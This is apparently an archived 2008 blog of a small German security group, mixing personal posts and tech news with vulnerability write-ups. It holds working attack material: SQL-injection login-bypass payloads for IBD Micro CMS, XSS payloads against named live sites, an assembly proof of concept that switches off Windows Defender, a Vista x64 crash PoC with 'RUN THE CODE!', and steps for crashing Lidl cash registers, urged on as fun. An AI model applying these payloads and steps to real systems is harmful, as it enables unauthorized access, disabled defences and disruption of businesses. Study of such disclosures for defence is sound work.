Pictures: PH-Neutral 0x7d8

Check out many more pictures in the [archive] and also take a look at the [collection] of pictures taken during the travel from Ulm to Berlin and back.

ENJOY! For more images taken during the last years, go to "Others" -> "[Images]"!

I tried my best to make no person get in the focus of the camera, you should get an idea of the atmosphere of the party, but not of the people, that have been there. Respect privacy is the motto of it!

Direct access to Sysinternals tools

At the moment Microsoft is doing a test phase with the Sysinternals tools of Marc Russinovich and Bryce Cogswell. Until now you could only find those utilities on the TechNet site of Microsoft [here], but now Microsoft is going a step further and you can directly start the tools via Start -> Run and type in the address of the tool.

Even it is still a test phase, I think it is a quite cool idea to have this possibility to run tools directly as they are not packed anymore! You can find the tools under [live.sysinternals.com]! Check out!

Source: heise.de

ImageMagick and PowerShell

When having 400 images, that have to be resized to a lower resolution it is very helpful to have such a utility like ImageMagick in combination with the Windows PowerShell, which is quite similar to the Linux/Unix Shell. First I thought of resizing the images with Gimp, which would work as well, but it is very(!) time consuming because you have to choose every image manually, scale it to a lower level and save it again. For some images this is no problem, but for 400 ones this is just too unproductive. So I told the problem to a friend of mine and he suggested me to use ImageMagick with the command line to do the task. So I started up the PowerShell and for every folder I had I just did the following command:

mogrify -resize 500x375 *.JPG
	

ImageMagick is available for Windows, Linux and Mac OS X and hopefully other systems. As you can see it can save you a lot of time when working with images. In the next days I will rename all images and then (I guess in the next week) I can upload the images to Wired Security.

(After) PH-Neutral 0x7d8

Just awesome! That's what I can say about PH-Neutral 0x7d8 in short words. In long words I could write endless sentences here of what I experienced over there in Berlin. The plans for the next days are like the following: Copy all photos I have taken during those four days (Thursday - Sunday) from my digital cameras SD stick to my home computer (about 400 images ~ 1.5 Gigabyte of raw files!). Then I have to sort of all of them and give them names, that are easy to understand of course. Furthermore I have to resize all the images to a lower level, otherwise every image would have 4.X Megabyte of size, which is far too much. Even more I will have to send more then a dozen emails to people, which I took photos of in Berlin, they asked me to do it. Hope I will remember everyone!

Only this will take several days if not worth I guess, so be patient with me, you will get to see some cool stuff of PH-Neutral 0x7d8, but it might take some days. Anyway, the party was really great, at day I was sitting in front of my computer and relaxing a bit and at night we partied together with a lot of alcohol and even more fun and joy! If you couldn't be there, sorry for you, you missed something! I introduced myself to a lot of new people and have even more contacts in the german and international scene now, which is really nice and the people are really cool, it wasn't hard to get in contact with them.

To make it not too(!) long: I am planning to write a document (PDF) with some photos and impressions of PH-Neutral within the next days/weeks and release over here. I hope to get this done soon, I will try to give you an idea of what you missed or even better, what you were part of and how I experienced all this.

At PH-Neutral I even got some impressions for my blog, well first of all: It will keep like this, NO WORDPRESS! Furthermore I will in future tell you where the news come from, otherwise people might think it is from me, which isn't the case very often as I write here about stuff from all over the net, so I will let you know the source of my news. And I will try to not get in touch with copyright too often *d'oh*, especially when publishing images. That's it from my side so far...

Restructuring or not?

At the moment I am thinking about redesigning Wired Security a bit. The question is simple: Shall the site be split into two parts, one with all the stuff, like releases, texts etc. and one with a blogging system like WordPress or not? The decision depends on how many people want to be part of the new blog and want to comment on it. Please write me an [email] with your oppinions. Think about one thing, there still is a blog of the members SkyOut and Komarov on LiveJournal.com, where you could comment on, so would this be the better possibility?

I will wait several days for emails coming in, if not much comes in, all will stay like it was!

Taking your notebook to the USA

It seems, that the world is getting stranger and stranger every day. After many new laws have taken place against cybercrime, which are often somehow useless or hit the wrong people, now it gets harder and harder to travel to another country with your laptop. The USA are one of the countries in the world, that have the strictest rules, what to do with people taking their laptop with them. The agents of the border control are allowed to check it as well as taking it with them and giving it back to you some days later. Read this cite from Guardian.co.uk:

Last month a US court ruled that border agents can search your
laptop, or any other electronic device, when you're entering
the country. They can take your computer and download its entire
contents, or keep it for several days. Customs and Border Patrol
has not published any rules regarding this practice, and I and
others have written a letter to Congress urging it to investigate
and regulate this practice.
	

Great, isn't it? And the USA are not even the only country doing this, there are other countries doing similar stuff, too. Seems our world is getting more crazy each day...

Linux Security 7.00 deletes /var

F-Secure had to recall their Linux security product "Linux Security 7.00", which was released some weeks ago due to a very serious bug they have now found out about. This can be considered an own goal somehow... The scanner has a bug, that leads to deletion of files inside the /var directory of Linux systems. If you don't have a backup of this folder and files have still been deleted, then they are gone into nirvana. To test this F-Secure wants the users to use the following command to test it:

grep “Device or resource busy” /var/opt/f-secure/fssp/dbupdate.log
	

If you get any output, then files (probably) have been deleted, now pray to god, that you have made a backup! Furthermore F-Secure ends up with the following statement:

F-Secure will release F-Secure Linux Security 7.01 within a few days,
that will fix this issue. A new notification will be posted when this
new version is available.
	

Great, isn't it? I think this case shows another time, that even (or especially?) products designed to secure your server might make it attackable or bring some kind of insecurity to it.

Read the [Linux weblog] of F-Secure for further information.

Blog.de XSSed

Blogging is one of the modern trends in the internet and many sites have come up, that enable you to have your own blog without having a deeper knowledge of (X)HTML, PHP, CSS and other web programming languages. One of those sites is the german blogging community around Blog.de. Just for fun our team mate Veda looked for a good blogging site and I suggested him to use Blog.de as one of many examples. Of course as a security expert the first thing he did was checking the site for security issues, such as the common and well known XSS attack vector... and yeap, it did work. Blog.de is XSSable. See it yourself:

The query for this was the following:

http://www.blog.de/login.php?url=
"><iframe height="300px" width="610px" src="...">
	

One of many XSS examples out there, but this is a very nice one, as it wouldn't be hard to build the login frame and phish users. Be careful!

F-Secure Vulnerabilities Information

The well known AntiVirus company F-Secure has opened a new section in their so called "Security Center". They will now provide information on important vulnerabilities and also the necessary information for the user how to fix those flaws. The service can not be compared to other security sites where mostly every vulnerability gets listed because F-Secure only writes down an advisory, when they think it is important enough for the user and I guess when it can be used by malicious programs. Nevertheless an interesting service.

Check out the site for this [here]!

Debian: Insecure crypto keys

Since 2006 all distributions based on Debian had to face a great insecurity due to a bug in a patch, that was made for the OpenSSL library. All distributions based on Debian have to face the same problem, such as the well known Ubuntu. The security expert Luciano Bello reported the problem, that makes it possible to prognose the used cryptographic keys generated by the OpenSSL library. This is a huge problem because of the immense use of this library in popular software and implementations, such as SSH, OpenVPN, Apache, S/MIME and others...

The Debian maintainers have brought out an [advisory] describing the problem and suggesting every administrator to totally renew all used signatures and keys generated with the insecure library as they migth have been broken.

This bug shows another time how important well implemented PRNGs ([P]seudo [R]andom [N]umber [G]enerators) are nowadays and how critical it can become when there is a bug in such an implementation. Unfixed servers still have to face the risk, that the believed to be secured connection can be hacked and sniffed.

Interspire ArticleLive NX XSS

And another advisory from Wired Security. This time a simple reflected XSS in the search engine of a commercial software for news editing and publishing, called "ArticleLive NX". First off, what does the publisher say about his script:

ArticleLive is a complete content management package that
lets you start, maintain and grow your own article, news
and/or blog site. It includes professionally designed,
CSS-driven website templates which are easy to customize
to your liking.
	

Fine so far, now let us make an online demonstration of their script. Go to the [demo page] and register with any credentials for a demonstration, then go the search engine site, located at "/demo_<some number>/search" and input your JavaScript, with escape chars in front of it:

"><script>alert("XSS");</script>
	

Finally search for it and you will have a popup being opened with the text "XSS" in it.

That script costs lots of money and isn't even protected against XSS...

[Read the advisory]

Microsoft Ad: Think Security

Reading a bit in House of Hackers (HoH) today, I found a video by Microsoft Japan, that PDP has posted there and started a discussion on Hacking. The video shows how "hackers" manipulate your PC in a way, that everyone should understand it. Therefore it is totally unrealistic, but nevertheless funny and worth looking. So check it out:

IBD Micro CMS 3.5 SQL Injection

Last night I was quite long awake and so I looked at some sources of content management systems and finally I found what I was looking for: A SQL Injection bug to bypass the login field and get logged in as administrator! The software is called IBD ([I]mplied [B]y [D]esign) Micro CMS in version 3.5, which is the newest one of 2008. The demo site of the software is taken offline due to some bugs as the maintainers say. Well no wonder, that there are bugs, when you look at the way they code. So let's take a look at the CMS.

You can download the tool [here] ([microcms.zip]). When you unpack the zipped folder you have the following things in your directory: micro_cms_files (folder), microcms_subdirectory_example (folder), microcms-admin-home.php, microcms-admin-login.php and microcms-index.php. So let's look at the interesting and buggy file "microcms-admin-login.php":

if ($_POST['action'] == 'admin_login') {
	$i = 0;
	if (!$_POST['administrators_username']) {
		$error[$i] = "Please enter your username.";
		$i++;
	}
	if (!$_POST['administrators_pass']) {
		$error[$i] = "Please enter a password.";
		$i++;
	}
if ($i == 0) {
	

So first off the tool checks, that both, username and password, are set, over the variable $i. If one is not set an error will occurr, if not the code goes on:

if ($i == 0) {
	$sql = '
		SELECT *
		FROM microcms_administrators
		WHERE administrators_username = "' . \
		$_POST['administrators_username'] . '" and
			administrators_pass = PASSWORD("' . \
			$_POST['administrators_pass'] . '")';
	$user_result = mysql_query($sql);
				
	if (mysql_num_rows($user_result) < 1) {
		$error[$i] = "That username and password \
		don't match, please try again.";
		$i++;
	} else {
	

Here we have the SQL Injection. As you can see "administrators_username" and "administrators_pass" are not filtered and just given to the script! So now we have to escape the whole thing, it looks like this:

Username: " or "1" = "1
Password: ") or "1" = "1" or PASSWORD("

The resulting query will look like this:

	$sql = '
		SELECT *
		FROM microcms_administrators
		WHERE administrators_username = "" OR "1" = "1" and
			administrators_pass = PASSWORD("") or "1" = \
			"1" or PASSWORD("")';
	

Fine, looks good... and finally the following code gets executed:

$admin = mysql_fetch_array($user_result);
$_SESSION['microcms_admin_username'] = \
$admin['administrators_username'];
$_SESSION['microcms_admin_password'] = $admin['administrators_pass'];
$_SESSION['microcms_admin_email'] = $admin['administrators_email'];
$_SESSION['microcms_admin_id'] = $admin['administrators_id'];
$_SESSION['microcms_admin_level'] = $admin['administrators_level'];
header("Location:microcms-admin-home.php");
$main_content = '<h2>You have successfully logged in!</h2><p>You may \
now navigate to the page whose content you would like to change.</p>';
	

FINALLY we are logged in as administrator! Now we can do whatever we want with the hacked site...

[Read the advisory]

Requirement: magic_quotes_gpc = Off

iV Guestbook 3.0.2 persistent XSS

One of my friends in the cyberworld, named Blake, has written his first advisory for a persistent XSS vulnerability in the software called "iV Guestbook". Versions older or equal 3.0.2 are vulnerable to XSS in several fields, that get not sanitized. He is actually not (yet) a member of Wired Security, but to do him a favor and because it fits good to our content I will publish this finding.

Some more information: When we look at the code, it looks like this:

<input type="text" name="ivname" value="XSS HERE" \
size="40" maxlength="50" />
	

To make the XSS work we have to escape the value field, doing the following:

"><script>alert("XSS");</script>
	

Sometimes I really ask myself what those "programmers" do the whole day? At least they don't read guidelines about secure(!) coding... Thanks to Blake for contributing this advisory.

Read the [advisory].

So now its wired-security.net

When you look close enough you will recognize a change at "Core" Security. It is now called Wired Security and has the new domain wired-security.net. The old page still links here and is registered under my name but the rest has changed. Some little changes have been done to some textfiles and releases (like the informations about the author, the website had to be changed of course). Now all should be clean and working. If you find an error, don't wait to tell me via [email].

Furthermore I decided to make new rules for the team. As it has many benefits to be in here, you should have some "barrier" to get in. It is nothing to worry about, but it had to be done, otherwise our team could loose plausibility! I decided to kick out nullskull from the team. Why that you and I guess nullskull want to know? That's because of the very simple and following reason: Everyone, who wants to come into Wired Security has to make some "tests" and provide information on him/her, so that the whole(!) team can decide what happens. In the case with nullskull I (SkyOut) for myself decided to take him after only one interview. That was a mistake, I have regrets about this. Sorry for this to everyone in the team. So the next time it will work like the following:

(1) You contact me via [skyout[-at-]wired-security.net[-dot-]net] with a subject like "Join"

(2) You have to answer the following questions:
   What is your handle in the cyberworld?
   In which country (if possible city) do you live?
   What languages can you read and write? Must have: English!
   How can we contact you? Preferred: ICQ, MSN or Jabber!
   What topics do you research on and in what are you well trained?
   Are you able to write code? If yes, which languages especially?
   What do you expect from Wired Security?
   Why should we take YOU?

(3) To prove your authenticity, you have to:
   Provide two to three things from you, either code(s) (choose the language)
   and/or text(s) (can be exploit, advisory...).

   Other way of getting in: A team member has to know and recommend you.

All this is only a guideline, but nevertheless you should follow it! Answer all questions and send your code(s) and/or text(s) to me and/or tell me, who I can ask for recommendation!

You have to know, that Wired Security is a family of people built around me (SkyOut). Even the members often don't know each other, they at least are long friends of me and I have a special interest of making this team a nice place for everyone of us. We are Whitehats and not Blackhats. This means we are doing research and hacking in any manner to learn from it and not to destroy something or harm anyone. If you can't find yourself in this definition you have crossed the wrong place to stay with us. Sometimes we are offensive and we believe in full disclosure, but we are white nevertheless!

That's enough from my side for the moment... Thanks for reading!

Livejournal and Nexpa.de

This time I don't want to make any news about a new security case or whatever. I just want to get rid of some information I have to tell you, so that you are up-to-date with any changes. If you have visited our site today or yesterday evening you might have seen, that there are some changes on the right side, that haven't been there before. Do you see them?!

First of we have a section for the blogs of our members, including me (SkyOut). Two of the blogs are hosted at Livejournal.com, the one by Tatsumori is hosted on its own webserver. You can find my profile of LJ under [skyout.wired-security.net] and the one by Andrej Komarov under [komarov.wired-security.net]. What are those journals about and why should you read it? Well... It is up to you if you read them, but sometimes there are news, that are not written here. For example I blog there about my personal life and thougths and here at Core Security I only blog about technical stuff. Furthermore I make some discussions about projects I do and plan. So you can have something like a preview of what will come soon here. All this is worth reading I think!

Now to the other parts of the news: I have made a link to our hoster [nexpa.de Internet Solutions] on the right side on the bottom. In this news I want to thank our hoster for providing us this place for a good price. It is really nice and working well. The interfaces to configure the server are great and we have webmail and more. All that rocks and our members have a lot of benefits with Core Security. We have endless Email addresses, subdomains, databases and more. We have 5000 MB of online storage place and 75 GB of traffic. That's a holy lot. Of course it costs some money, but that's okay for me. The project will keep adfree and open for everyone! It's our ideology to share knowledge with you, I hope you honor this as much as we invest work in it.

Turning off Windows Defender

Izee from EOF has found out something else. You can turn off Windows Defender even it is said to be secured against such actions. You don't believe this? Then read carefully now: The Windows Defender application uses an own API to be enabled or disabled, the function therefore is called WDEnable(); and has the following structure:

HRESULT WDEnable(
	BOOL fEnable
);
	

For the parameters MSDN says the following:

Parameters

	fEnable
		[in] Windows Defender status that the calling
		application wants to set. TRUE enables Windows
		Defender. FALSE disables Windows Defender. 
	

Interesting enough there is a resulting code called "TRUST_E_NOSIGNATURE", which you will get when your application is not signed and therefore not allowed to turn off Windows Defender. Okay sounds good and secure, doesn't it? Well... Let's read a bit more about what Microsoft says:

Remarks

	The application calling this function must run with
	administrator permissions on the local computer. In
	Windows Vista, the user is prompted for administrator
	permission when the application is running with lower
	privileges. Windows Defender also validates proper signing
	of the calling process (and all the loaded modules) before
	allowing the calling application to change the status. If the
	calling process image (or any loaded modules) is not signed
	or is flagged as a threat by the Windows Defender signature,
	then the call fails with the appropriate error code.
	

Well perfect, nothing we have to worry about, do we? ... Now the interesting thing comes in. Izee has written a PoC for it in ASM and here is the code:

	extrn   LoadLibraryA   :proc
	extrn   GetProcAddress :proc
	extrn   ExitProcess    :proc

 .data

	l db '\Program Files\Windows Defender\MpClient',0
	p db 'WDEnable',0

 .code

 eof proc
 push rsp

	lea  rcx, l
	call LoadLibraryA

	lea  rdx, p
	mov  rcx, rax
	call GetProcAddress

	xor  rcx, rcx ;Turn Windows Defender off
	call rax

	call ExitProcess

 eof endp
 end
	

That's it and Windows Defender will be turned off. And guess what? The code has not been signed! The code has been tested on Windows Vista x86 and x64 (using administrative privileges of course!

See the images for yourself! Before:

And after the execution of the (unsigned) program:

SHARE THIS INFORMATION!

Did you know...

...that the technology named (by the vendor Nvidia) SLI has been designed in the last century and is nothing totally new? I learned that not long ago in my company, when I looked at a wallpaper, that showed how gaming has developed over the years and in the year 1998 the first graphics card with SLI was brought out to the market. But then for many years no card like this came out and now? Now it is common to have SLI cards to speed up your graphics and have an even better experience while gaming.

A typical SLI powered graphics card:

House of Hackers

PDP from [GNUCITIZEN] started a social network on the site ning.com, which is called "House of Hackers". As far as I understood it, it is planned to become a place for hackers and people sharing their lifestyle and ideas. It shall not become a place for any illegal activities nor a place for script kiddies thinking they are hackers because of using some ready-to-click tool on Windows. I hope, that this project reaches its aim and gets a cool user base. I registered for it and will look over it from time to time. Check out my [profile] if you want, but there is not much on it, yet and I am active in other blogging sites as well, so I can't write that much in every single page.

DebugActiveProcess on Vista x64

My friend Izee from EOF(-Project.net) has found a way to make Windows Vista x64 (only) freeze and crash with a BlueScreen Of Death. The error occurrs when a special call is done and gets debugged in some Ring3 debugger, like IDA or WinDBG. The problem only occurrs on Windows Vista in the x64 version and has been tested with and without the Service Packs. Let's look closer on the analysis Izee has done, it is quite interesting:

or rcx,-1
call DebugActiveProcess
	

That is the call, that makes Vista turn into a BSOD when being debugged. The whole code looks like this:

extrn  MessageBoxA         :proc
extrn  DebugActiveProcess  :proc
extrn  ExitProcess         :proc

.data

capt   db  'Debugger:'                            ,0
body   db  "You aren't under debugger, are you?"  ,0

.code

Main proc

or rcx,-1
call DebugActiveProcess

sub rsp, 28h
xor r9d,r9d
lea r8, capt
lea rdx, body
xor rcx,rcx
call MessageBoxA

xor rcx,rcx
call ExitProcess

Main endp
end
	

Furthermore he analyzed it and here comes the dissassembled code of it:

extrn  CsrGetProcessId :proc

.code

eof proc

;-----------------------
;ntdll_DbgUiConnectToDbg
;-----------------------
           
    mov  r11, rsp
    sub  rsp, 58h

    mov  dword ptr [rsp+20h], 30h

    mov  rcx, gs: [30h]
    lea  r8,  [r11-38h]
    mov  r9d, 1
    add  rcx, 16A8h

    mov  r10, rcx
    mov  eax, 91h
    syscall

    add rsp, 58h

    call CsrGetProcessId

    lea  r9,  [rsp+20h]
    lea  rcx, [rsp+78h]

    mov  edx, 0C3Ah
    mov  [rsp+20h], rax

    mov  r10, rcx
    mov  eax, 23h  ;NtOpenProcess
    syscall

    mov  rcx, [rsp+78h]

;-----------------------------
;ntdll_DbgUiDebugActiveProcess
;-----------------------------

    mov  rdx, gs:[30h]
    mov  rdx, [rdx+16A8h]

    mov  r10, rcx
    mov  eax, 0ADh
    syscall

    ;DoS

    ret
           
    ;BSOD

eof endp
end
	

And finally: RUN THE CODE!

For a live discussion on this topic, check out the discussion Izee has opened on the VX forum of EOF [here]. I think that is a quite interesting finding, I wonder, what Microsoft did there.

XSS through Morsecode

Sometimes vulnerabilities found in webpages are just funny, for example a XSS vulnerability being able to be exploited through Morsecode. You don't believe me? Well, here comes the explanation: The following website features a tool, that makes Morsecode get written into cleartext: [www.qbit.it/lab/demorse.php]. So far nothing to worry about, but what if the tool has no real filtering? Then you can input whatever text you want. A simple test with an IFrame did work out. So look at this:

..  ..-.  .-.  .-  --  .
	

That is the Morsecode for "iframe" (without the quotes). Now if we just make the starting and closing tags we should have a working IFrame:

<..  ..-.  .-.  .-  --  .>
	

And now when we press "Translate from Morse code", the following happens:

The code got run! (Test) Exploit worked! Sometimes vulnerabilities are just too funny to not write about them...

Lidl Live Hacking

A friend of mine informed me about something very funny today: The electronic cash box of Lidl has a bug, that is known for several months now, being found back in November 2007 and still not fixed! The programmer of the application running the cash system made a very simple, but hard mistake, that can crash the whole system in a second. How does it work you might ask? Do I need access to the system? Via USB? No and no, it is much easier then this! The programmer made a simple mistake in the exception handling leading to this bug, instead of doing a check for EQUAL ==, he just did a check for LESS OR EQUAL <=, at least that is what is guessed to has happened. The bug occurrs when you buy something and have a price of exactly 0.00 EURO. Look for yourself, that's a picture taken with this price:

Now the cashier presses OK and BOOM this happens:

The cash box is asking for authorization, which is similar to a total crash and shutdown. Score! Now you want to know how you can make your cashier of choice go insane? Just do it like that: Bring two empty bottles of water back, which give you 0.50 EURO and then buy a bottle of water, which costs 0.44 EURO and finally buy a plastic bag for 0.06 EURO. You will end up with "0.50 EURO - (0.44 EURO + 0.06 EURO)" and that is ??? RIGHT: 0.00 EURO! Have fun crashing the systems, they had their chance to fix it, now it is time to have fun hacking!

EnDeRE v0.1.48

The tool by Veda has been updated another time. On such a sunny Sunday he coded several "Esoteric Languages" into the tool. The descriptions for them will be done as soon as possible, just try it out. The supported (esoteric) languages are:

Brainfuck
Befunge
Cow
HQ9+
INTERCAL
LOLCODE
Malboge
Ook!
Piet
Rebol
Speed
SPL
Unlambda
Whirl
whitespace
	

Have you heard of every language before? I guess not, so try them out if you want. They are sometimes quite funny and interesting, especially Brainfuck should be well known to most of you, at least VXers know it very well *smile*...

[Download EnDeRE v0.1.48]
[View online version]

Password Swordfish

The day did not work as planned, but that didn't irritate me a lot. I just decided to watch a movie and will it shortly present here, as it is somehow related to hacking and vxing, even it is more like an action thriller, nevertheless it is a nice movie, that has some good hacking elements in it. The movie I am talking about is called "Password Swordfish", which is based on the name "Operation Swordfish", which gets described in the movie a bit later. Furthermore in the end this password gets another sense. But now to the movie itself, I want to give you a short idea of what it is:

The movie shows the story of the hacker Stanley, who has been
in prison for 18 months for implementing a virus in a cyberprogram
by the FBI. It is not allowed for him to touch any computer, but there
is one thing, that makes him change his mind: The love to his daughter.
Stanley lives outside the city in a very poor place and has no money
for lawyers to fight for the right to get his daughter. Then comes the
turning point: He gets an offer by someone called Gabriel, who offers
him 10 million dollars for writing a virus, that should get implemented
in a bank network to steal money from several secret accounts, all in
all several billions of dollars. Stanley is not sure what to do, on the
one hand he does not want to get in trouble with the FBI again, on the
other hand it is his only chance to get his daughter back. In the end
he works for Gabriel...
	

The movie is full of action scenes, but has some nice, even unrealistic, sequences where Stanley, the main person, is sitting in front of his computer and writing the virus and in the end finally implementing it in the bank network. In my oppinion it is not a real hacker movie, but nevertheless worth looking. Check it out!

SkyOut and Veda

Today I (SkyOut) met with our team mate Veda. He came to my town (Ulm) and we went eating in some german restaurant and relaxed while drinking a beer and talking about new projects, that are planned to happen in the future. We discussed this and that and it was really cool to talk to Veda in real again. It was the second time we met in the real world! We talked about some things I am planning to release soon and some ideas, that have to be coded or written down. It will take some time to do all this as it is somehow quite complicated and needs a lot of research, but keep visiting our site and stay up-to-date with our stuff!

New member: Andrej Komarov

Core Security welcomes a new member, named Andrej Komarov! He is a long friend of mine (SkyOut) and I am very happy to work with him on this project now. Andrej is working in the field of computer security for many years now and is an employee of IT Defence Ltd/Russia, a company in Moscow, that is researching on IT Security and that has brought out some great tools and advisories for vulnerabilities. Andrej Komarov is mostly coding in Python and is working on a security tool at the moment, that will be soon released on Core Security and other sites. Furthermore he has done articles for Hakin9 and is a continous author of the russian Magazine Xakep, which means in english nothing else then "Hacker". So let's rock together!

Name:  komarov
Email: komarov[-at-]core-security[-dot-]net
	

OpenBSD 4.3

Some great news today: The new OpenBSD release is officially available on the servers. The new version 4.3 features new hardware support and tools and has many interesting fixes included, that help a lot in daily work. All in all there are more then 4900 ports available and pre-build packages for many platforms. Some highlights taken from the official page:

* Gnome 2.20.3
* GNUstep 1.14.2
* KDE 3.5.8
* Mozilla Firefox 2.0.0.12
* Mozilla Thunderbird 2.0.0.12
* MySQL 5.0.51a
* OpenMotif 2.3.0
* OpenOffice.org 2.3.1
* PostgreSQL 8.2.6
* Xfce 4.4.2
	

I do not want to print everything here now, just check out the list for yourself [here]. To download the new version go to one of the many [download mirrors] or download via BitTorrent, which I did and which works very fast! For the list go to [openbsd.somedomain.net]. Enjoy and welcome in the new month with a great new and improved operating system!